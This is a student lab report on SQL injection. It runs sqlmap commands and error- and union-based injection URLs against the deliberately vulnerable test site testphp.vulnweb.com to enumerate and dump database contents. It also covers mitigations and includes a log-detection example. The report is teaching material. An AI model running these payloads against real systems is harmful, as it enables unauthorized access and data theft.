
18bit0236 Ism Lab Da 6

This document provides details about using the sqlmap tool to perform SQL injection testing on a vulnerable website. It includes commands to identify databases, tables, columns, and extract data. Steps are also provided to prevent SQL injection vulnerabilities like input validation, data sanitization, prepared statements, stored procedures and keeping systems patched. Risks of SQL injection are explained like bypassing authentication, executing remote commands, denial of service and database fingerprinting. The document also shows how to exploit an authentication bypass vulnerability using SQL injection on a login page and provides a link to a course on using the sqlmap tool.

Uploaded by

Rohit.M. Somani

CSE3502 - Information Security Management (L51-L52)

Lab Assessment – 6

SQLMap

Rohit.M.Somani
18BIT0236

Faculty: DR. JEYANTHI N


1: List information about the existing databases

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

Comments: Using the --dbs option, we get the list of the databases present in the backend of that particular website.

The backend DBMS is MySQL.

2: List information about Tables present in a particular Database

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables

Comments: Using -D acuart with --tables, we get the tables in the acuart database.

3: List information about the columns of a particular table

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists --columns

4: Dump the data from the columns

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T artists -C aname --dump

Comments: The --dump option finally dumps the artist names (the aname column) from the vulnerable database.

5: Prevent SQL Injection

Steps to prevent SQL injection attacks

1. Validate User Inputs

A common first step to preventing SQL injection attacks is validating user
inputs. First, identify the essential SQL statements and establish a whitelist for
all valid SQL statements, leaving unvalidated statements out of the query.
This process is known as input validation or query redesign.

2. Sanitize Data By Limiting Special Characters

Another component of safeguarding against SQL injection attacks is
mitigating inadequate data sanitization. Because SQLi attackers can use
unique character sequences to take advantage of a database, sanitizing data
not to allow string concatenation is critical.

3. Enforce Prepared Statements And Parameterization

Sadly, input validation and data sanitization aren’t fix-alls. It’s critical
that organizations also use prepared statements with parameterized queries, also
known as variable binding, for writing all database queries. By defining all
SQL code involved with queries, or parameterization, you can distinguish
between user input and code.

4. Use Stored Procedures In The Database


Similar to parameterization, using stored procedures also requires variable
binding. Unlike the prepared statements approach to mitigating SQLi, stored
procedures reside in the database and are called from the web application.
Stored procedures are also not immune to vulnerabilities if dynamic SQL
generation is used.

5. Actively Manage Patches And Updates

Vulnerabilities in applications and databases that are exploitable using SQL
injection are regularly discovered and publicly identified. Like so many
cybersecurity threats, it’s vital organizations stay in tune with the most recent
news and apply patches and updates as soon as practical. For SQLi purposes,
this means keeping all web application software components, including
database server software, frameworks, libraries, plug-ins, and web server
software, up to date.
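
Steps 1 and 3 above, shown side by side as an added example (not part of the original lab report): the same listing query built by string concatenation and then with allowlist validation plus a bound parameter. Python with an in-memory SQLite database is used so it runs offline; the table, its rows and all function names are assumptions made for the illustration.

```python
import sqlite3

# Same shape as the union request used later in this report, cut to two columns.
PAYLOAD = "-1 union select 1,2--"

def make_db():
    # Constructed sample data standing in for the product listing table.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 1, 'poster'), (2, 1, 'print'), (3, 2, 'frame');
    """)
    return db

def list_products_vulnerable(db, cat):
    # BEFORE: input is concatenated into the SQL text, so it is parsed as SQL.
    return db.execute("SELECT id, name FROM products WHERE cat = " + cat).fetchall()

def validate_cat(cat):
    # Step 1: allowlist validation. A category id is 1 to 6 ASCII digits, nothing else.
    if not (cat.isascii() and cat.isdigit() and len(cat) <= 6):
        raise ValueError("invalid category id")
    return int(cat)

def list_products_bound(db, cat):
    # Step 3: fixed statement text; the value travels separately as a bound parameter.
    sql = "SELECT id, name FROM products WHERE cat = ? ORDER BY id"
    return db.execute(sql, (cat,)).fetchall()

def list_products_safe(db, cat):
    # Steps 1 and 3 together: reject malformed input, then bind the validated value.
    return list_products_bound(db, validate_cat(cat))

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", list_products_vulnerable(db, PAYLOAD))
    print("bound only:  ", list_products_bound(db, PAYLOAD))
    print("safe, cat=1: ", list_products_safe(db, "1"))
```

The concatenated version returns a row that does not exist in the table, which shows the input changed the query itself; the bound version compares the whole string as data and matches nothing.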

6: Command Injection Vulnerability and Mitigation

The vulnerability can be mitigated using a prepared statement to
create a parameterized query as follows:

    String query = "SELECT userName, balance "
                 + "FROM accounts WHERE userID = ? AND password = ?";

    try {
        PreparedStatement statement = connection.prepareStatement(query);
        // Bind both placeholders; the values are sent as data, never as SQL text.
        statement.setInt(1, Integer.parseInt(request.getParameter("userID")));
        statement.setString(2, request.getParameter("password"));
        ResultSet rs = statement.executeQuery();
        while (rs.next()) {
            page.addTableRow(rs.getString("userName"),
                             rs.getFloat("balance"));
        }
    } catch (SQLException e)
    { ... }

If an attacker attempts to give a value to the userID field that is not a
simple integer, then Integer.parseInt() will throw a NumberFormatException
before the value reaches statement.setInt(), rather than permitting the query
to complete.

7: SQL Injection

Error based SQL Injection

http://testphp.vulnweb.com/listproducts.php?cat=1%27’

When we paste this address, we get an error generated at the server end, which shouldn’t be shown.

Union Based SQL Injection

http://testphp.vulnweb.com/listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--

Using this request we get the below error
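
From the defender's side, the two requests above leave recognisable traces in the web server's access log. The following is an added example (not part of the original lab report) that flags them; the log lines are constructed, the IP addresses are documentation addresses, the sqlmap version in the User-Agent is a placeholder, and the rule names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in combined log format.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /listproducts.php?cat=1%27 HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [01/Jan/2024:10:02:00 +0000] "GET /listproducts.php?cat=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11-- HTTP/1.1" 200 4800 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
]

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')

# Each rule is applied to the URL-decoded value of every query parameter.
RULES = {
    "quote_in_param": re.compile(r"['\"]"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "sql_comment": re.compile(r"--|/\*|#"),
}

def findings(line):
    """Return (client_ip, set of rule names hit), or None if the line does not parse."""
    m = LINE.match(line)
    if not m:
        return None
    ip, target, agent = m.groups()
    hits = set()
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(name for name, rx in RULES.items() if rx.search(value))
    if agent.lower().startswith("sqlmap/"):
        hits.add("sqlmap_user_agent")   # default UA; absent if the tester overrides it
    return ip, hits

def scan(lines):
    """Group rule hits by client IP, skipping lines with no hits."""
    report = {}
    for line in lines:
        parsed = findings(line)
        if parsed and parsed[1]:
            report.setdefault(parsed[0], set()).update(parsed[1])
    return report

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```

A quote in a parameter also occurs in legitimate input such as surnames, so these rules are triage signals to correlate per client, not proof of an attack.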

8: Risks associated with SQL injection

SQL injection is the most common threat to database systems. It leads to
loss of very secure or confidential data. It is nothing but
unauthorized access to data systems or accounts.

The following are the risks associated with SQL Injection:

1. Bypassing Authentication:
It is most important to focus on bypassing authentication
during the penetration test because the attacker can access
the database just like an authorized user and can perform
his desired tasks on the database.
2. Identifying Injectable Parameters:
The attacker will collect information about the structure of
the back-end database of a web application and will include
dynamic content in the website. This may lead
visitors to install malicious code and may redirect them to a
malicious site.
3. Executing Remote Commands:
Executing these remote commands will provide attackers a
tool to execute arbitrary commands on the database.
For example, a remote user can execute stored database
procedures and functions from a remote SQL interactive
interface.
4. Denial of Service:
The attacker can flood the server with requests so that he will have
the authority to stop the service to valid users, or he can delete
some data.
5. Database Fingerprinting:
The attacker can determine the type of database used in the
backend so that he can use database-specific attacks that
correspond to weaknesses in a particular DBMS.

9: Authentication Bypass using SQL Injection on Login Page

For this I installed DVWA to perform SQL injection on this vulnerable website.

We enter user ID 1 as a trial and error method.


10: Visit the URL below and record your inferences

https://cloudacademy.com/course/sqlmap-sql-injection-tool-the-basics/sqlmap-sql-injection-tool-the-basics/

This course covers the basics of using SQLmap.

SQLmap is an open-source tool used in penetration testing to detect and
exploit SQL injection flaws. SQLmap automates the process of detecting
and exploiting SQL injection. SQL Injection attacks can take control of
databases that utilize SQL. They can affect any website or web app that
may have a SQL database linked to it, such as MySQL, SQL Server, Oracle
and many others. These databases often contain sensitive data such as
customer information, personal data, trade secrets, financial data and so
on. Being able to find SQL vulnerabilities, and defend against them, is
vital. SQLmap can help in finding these vulnerabilities.
